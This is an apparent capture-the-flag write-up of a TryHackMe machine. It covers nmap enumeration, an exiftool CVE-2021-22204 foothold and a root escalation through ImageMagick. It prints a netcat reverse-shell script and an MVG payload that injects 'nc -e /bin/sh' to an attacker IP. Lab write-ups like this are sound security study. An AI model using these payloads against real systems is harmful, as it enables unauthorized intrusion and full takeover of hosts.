Date: 21st / 22nd November 2021
Description
This is my writeup for the recent CTF hosted by Mystiko, which was held on TryHackMe. I had a great time participating in the CTF and found it to be very challenging and enjoyable. I would like to express my gratitude to the Mystiko team for organizing such a fantastic event and for creating such a compelling and challenging machine.
-
THM Link: MystikoCTF2021
-
Difficulty: Medium
Unfortunately, I did not have a lot of time to dedicate to the CTF, but I was still able to achieve a strong finish and share third place with cryptonic007
.
Enumeration
The CTF had 3 different webapps
Only PIXEL, DEV01 and DEV02 are in scope for this CTF. Do NOT attack any other IP address or hostname.
As a first step in the process of identifying and analyzing the target system, it is a good idea to run nmap
:
nmap -sCV 10.10.206.211 -vvv
There are two open ports on the target: ports 22 (SSH) and 8080 (Nginx WebServer)
Let’s dig into the webserver
Upon examining the web server, I found that it appears to be an image uploader. I opened the source code of the page to see if there were any hidden comments, but I did not find any. I also confirmed that the server is only accepting image files.
I uploaded an image and used Burp Suite to capture and analyze the traffic
I attempted to manipulate the file extension and MIME type in various ways, but none of these methods seemed to have any effect. However, while reviewing the responses from the server, I noticed something interesting.
I discovered that there was a hidden HTML heading in the response that contained information about the picture I had uploaded, including the MIME type, size, and image dimensions. This heading also contained a strange value that appeared to be a version number, starting with 10.61
!
I suspected that this heading might be related to the exiftool
tool, so I looked for any recent vulnerabilities in exiftool that I could potentially exploit. I came across CVE-2021-22204
, which I had not previously had the opportunity to try.
Foothold
I tried several different public CVEs in an attempt to find one that would be effective in this situation. After testing multiple options, I was finally able to identify a working exploit.
https://github.com/bilkoh/POC-CVE-2021-22204
With the working exploit in hand, I was able to use the following command line to create the malicious image:
So the picture will download a file shell.sh
from my webserver and execute it.
shell.sh
:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.2.95.202 9009 >/tmp/f
Let’s upload the file
I set up a listener and then uploaded the malicious image to the server. As a result, I was able to successfully obtain a reverse shell.
Getting the first flag local.txt
was pretty easy, the flag was in the home directory of our current user pixel
and I was able to read it without any restrictions.
Privilege Escalation
As a best practice, one of the first things I usually do after obtaining a reverse shell is to run the sudo -l
command to check if there are any commands that I can execute using sudo.
Perfect ! we have a binary called pixel . I copied this binary to my own machine in order to perform some reverse engineering and analysis.
I had to use ghidra, but I won’t say much : nothing was interesting.
I ran the binary on my own machine to performe some dynamic analysis.
The binary appears to be an image toolkit created by the SIXER team. As part of my analysis, I chose to use the tool to convert an image to a PDF file and see what would happen.
The Generating PDF
line show us that the binary is using the /usr/local/bin/convert
tool to convert the image to a PDF. I had recently worked with a 2016 exploit involving convert
, so I quickly returned to the Pixel machine to check the version of convert that was being used.
I was pleased to discover that the version of convert being used on the Pixel machine was indeed vulnerable to the exploit. By searching for ImageMagick exploit online, I was able to find a number of articles and resources that provided more information about this vulnerability and demonstrated various methods for exploiting it.
I followed these steps to exploit it:
1) Go to /tmp/
directory.
1) Create a new file exploit.mvg
:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|nc -e "/bin/sh" "10.2.95.202" "9009)'
pop graphic-context
2) Set my listener on port 9009:
nc -lvnp 9009
3) Run sudo /usr/bin/pixel
and follow the steps as the image shows (instead of x.jpg
enter exploit.mvg
)
4) Going back to my listener to check if I got a reverse shell:
And yes ! I gained root access to the system and I was able to read the second flag proof.txt